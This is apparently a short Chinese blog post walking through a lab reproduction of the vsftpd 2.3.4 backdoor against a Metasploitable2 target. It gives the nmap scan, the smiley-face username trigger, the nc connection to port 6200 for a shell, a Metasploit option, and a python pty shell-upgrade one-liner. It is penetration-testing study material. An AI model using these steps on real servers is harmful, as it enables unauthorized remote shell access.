vsftp:)漏洞复现
前言
一个很普通的漏洞,并且年代古老,仅了解即可
漏洞利用前提
vsftp版本:2.3.4
漏洞利用
主机:kali:192.168.1.13
靶机:metasploitable2-Linux:192.168.1.8
- 利用方法一:
- 利用nmap –script-vuln -p 21 192.168.1.8,发现主机存在该漏洞
- 以user=”user:)”,password=12345 登录ftp
- 回到kali,nc连接靶机的6200端口,拿到shell
- 也可以在msf控制台里面调用
拓展
- python -c “import pty;pty.spawn(‘/bin/bash’)”命令可美化命令行
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Jasonの小窝!
评论
TwikooValine